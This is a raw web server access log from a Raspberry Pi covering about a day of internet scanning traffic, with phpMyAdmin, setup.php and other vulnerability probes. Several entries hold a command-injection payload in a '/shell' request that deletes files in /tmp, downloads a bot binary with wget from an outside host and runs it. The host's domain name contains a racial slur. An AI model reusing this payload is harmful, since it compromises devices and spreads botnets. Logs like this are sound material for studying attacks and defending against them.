Wed Feb 12 06:25:05 MST 2020 06:25:05 up 11 days, 18:28, 1 user, load average: 0.43, 0.30, 0.33 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 31Jan20 11days 8:48 1.34s /usr/bin/lxsession -s LXDE-pi -e LXDE 189.163.3.201 - - [12/Feb/2020:13:27:39 +0000] "GET / HTTP/1.0" 200 25000 "" "" 95.9.94.245 - - [12/Feb/2020:13:51:22 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 222.186.19.221 - - [12/Feb/2020:14:59:26 +0000] "UNKNOWN HTTP/1.1" 400 0 "" "" 119.39.46.155 - - [12/Feb/2020:15:01:19 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 27.211.180.147 - - [12/Feb/2020:15:01:19 +0000] "HEAD / HTTP/1.1" 200 0 "" "Mozilla/4.01687919 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; Media Center PC 6.0)" 183.129.159.242 - - [12/Feb/2020:15:06:44 +0000] "GET / HTTP/1.0" 200 25000 "" "" 123.179.12.167 - - [12/Feb/2020:15:21:20 +0000] "UNKNOWN HTTP/1.1" 400 0 "" "" 113.58.240.175 - - [12/Feb/2020:15:21:20 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36" 222.82.54.208 - - [12/Feb/2020:15:21:20 +0000] "UNKNOWN HTTP/1.1" 400 0 "" "" 113.128.104.238 - - [12/Feb/2020:15:21:20 +0000] "UNKNOWN HTTP/1.1" 400 0 "" "" 123.145.24.37 - - [12/Feb/2020:15:21:21 +0000] "UNKNOWN HTTP/1.1" 400 0 "" "" 175.184.167.216 - - [12/Feb/2020:15:21:24 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36" 122.224.129.237 - - [12/Feb/2020:15:42:31 +0000] "GET / HTTP/1.0" 200 25000 "" "" 83.14.240.58 - - [12/Feb/2020:15:44:36 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 34.74.82.155 - - [12/Feb/2020:16:16:42 +0000] "GET /dd06d16ddce4ee3094e80f3c840bb567.php HTTP/1.1" 404 0 "" "" 34.74.82.155 - - [12/Feb/2020:16:16:42 +0000] "GET /097C08F2AC3BF8F02E25CC3994507EA8.php HTTP/1.1" 404 0 "" "" 34.74.82.155 - - [12/Feb/2020:16:16:43 +0000] "GET /9bed1ce23611489f4c3793d01765ec68.php HTTP/1.1" 404 0 "" "" 34.74.82.155 - - [12/Feb/2020:16:16:43 +0000] "GET /phpmyadmin/index.php HTTP/1.1" 404 0 "" "" 34.74.82.155 - - [12/Feb/2020:16:16:43 +0000] "GET /phpMyAdmin/index.php HTTP/1.1" 404 0 "" "" 222.142.135.228 - - [12/Feb/2020:16:32:58 +0000] "POST /HNAP1/ HTTP/1.0" 404 0 "" "" 111.242.20.80 - - [12/Feb/2020:19:15:28 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 111.242.20.80 - - [12/Feb/2020:19:15:28 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://jhasdjahsdjasfkdaskdfasBOT.niggacumyafacenet.xyz/jaws;sh+/tmp/jaws HTTP/1.1" 404 0 "" "Hello, world" 36.232.183.45 - - [12/Feb/2020:19:15:52 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://jhasdjahsdjasfkdaskdfasBOT.niggacumyafacenet.xyz/jaws;sh+/tmp/jaws HTTP/1.1" 404 0 "" "Hello, world" 36.232.183.45 - - [12/Feb/2020:19:15:52 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 122.118.81.152 - - [12/Feb/2020:19:15:59 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://jhasdjahsdjasfkdaskdfasBOT.niggacumyafacenet.xyz/jaws;sh+/tmp/jaws HTTP/1.1" 404 0 "" "Hello, world" 122.118.81.152 - - [12/Feb/2020:19:15:59 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 114.39.146.29 - - [12/Feb/2020:19:16:00 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://jhasdjahsdjasfkdaskdfasBOT.niggacumyafacenet.xyz/jaws;sh+/tmp/jaws HTTP/1.1" 404 0 "" "Hello, world" 114.39.146.29 - - [12/Feb/2020:19:16:01 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 36.226.16.202 - - [12/Feb/2020:19:16:15 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://jhasdjahsdjasfkdaskdfasBOT.niggacumyafacenet.xyz/jaws;sh+/tmp/jaws HTTP/1.1" 404 0 "" "Hello, world" 36.226.16.202 - - [12/Feb/2020:19:16:15 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 172.104.242.173 - - [12/Feb/2020:19:48:28 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 104.152.52.31 - - [12/Feb/2020:20:08:21 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 60.191.52.254 - - [12/Feb/2020:20:47:27 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 60.191.52.254 - - [12/Feb/2020:20:47:27 +0000] "HEAD / HTTP/1.1" 200 0 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36" 134.249.158.18 - - [12/Feb/2020:21:02:19 +0000] "GET / HTTP/1.1" 400 0 "" "" 128.14.134.134 - - [12/Feb/2020:21:37:08 +0000] "GET /solr/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 " 78.189.175.245 - - [13/Feb/2020:01:07:30 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 151.50.132.220 - - [13/Feb/2020:01:20:01 +0000] "GET / HTTP/1.1" 400 0 "" "" 35.196.14.98 - - [13/Feb/2020:01:57:19 +0000] "GET /dd06d16ddce4ee3094e80f3c840bb567.php HTTP/1.1" 404 0 "" "" 35.196.14.98 - - [13/Feb/2020:01:57:19 +0000] "GET /097C08F2AC3BF8F02E25CC3994507EA8.php HTTP/1.1" 404 0 "" "" 35.196.14.98 - - [13/Feb/2020:01:57:19 +0000] "GET /9bed1ce23611489f4c3793d01765ec68.php HTTP/1.1" 404 0 "" "" 35.196.14.98 - - [13/Feb/2020:01:57:20 +0000] "GET /phpmyadmin/index.php HTTP/1.1" 404 0 "" "" 35.196.14.98 - - [13/Feb/2020:01:57:20 +0000] "GET /phpMyAdmin/index.php HTTP/1.1" 404 0 "" "" 178.128.6.69 - - [13/Feb/2020:02:20:25 +0000] "GET /muieblackcat HTTP/1.1" 404 0 "" "" 178.128.6.69 - - [13/Feb/2020:02:20:25 +0000] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 400 0 "" "" 178.128.6.69 - - [13/Feb/2020:02:20:25 +0000] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 400 0 "" "" 178.128.6.69 - - [13/Feb/2020:02:20:25 +0000] "GET //pma/scripts/setup.php HTTP/1.1" 400 0 "" "" 178.128.6.69 - - [13/Feb/2020:02:20:26 +0000] "GET //myadmin/scripts/setup.php HTTP/1.1" 400 0 "" "" 178.128.6.69 - - [13/Feb/2020:02:20:26 +0000] "GET //MyAdmin/scripts/setup.php HTTP/1.1" 400 0 "" "" 164.52.24.163 - - [13/Feb/2020:02:45:18 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 139.162.106.181 - - [13/Feb/2020:03:10:59 +0000] "GET / HTTP/1.1" 200 25000 "" "HTTP Banner Detection (https://security.ipip.net)" 94.180.244.72 - - [13/Feb/2020:04:25:26 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 124.149.191.141 - - [13/Feb/2020:04:38:05 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 103.90.205.163 - - [13/Feb/2020:05:44:37 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 165.227.15.24 - - [13/Feb/2020:06:01:41 +0000] "GET /muieblackcat HTTP/1.1" 404 0 "" "" 165.227.15.24 - - [13/Feb/2020:06:01:41 +0000] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 400 0 "" "" 165.227.15.24 - - [13/Feb/2020:06:01:42 +0000] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 400 0 "" "" 165.227.15.24 - - [13/Feb/2020:06:01:42 +0000] "GET //pma/scripts/setup.php HTTP/1.1" 400 0 "" "" 165.227.15.24 - - [13/Feb/2020:06:01:42 +0000] "GET //myadmin/scripts/setup.php HTTP/1.1" 400 0 "" "" 165.227.15.24 - - [13/Feb/2020:06:01:42 +0000] "GET //MyAdmin/scripts/setup.php HTTP/1.1" 400 0 "" "" 45.181.232.209 - - [13/Feb/2020:06:46:07 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 155.93.177.97 - - [13/Feb/2020:09:44:52 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" Thu Feb 13 06:25:05 MST 2020 06:25:05 up 12 days, 18:28, 1 user, load average: 0.37, 0.44, 0.88 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 31Jan20 12days 9:23 1.34s /usr/bin/lxsession -s LXDE-pi -e LXDE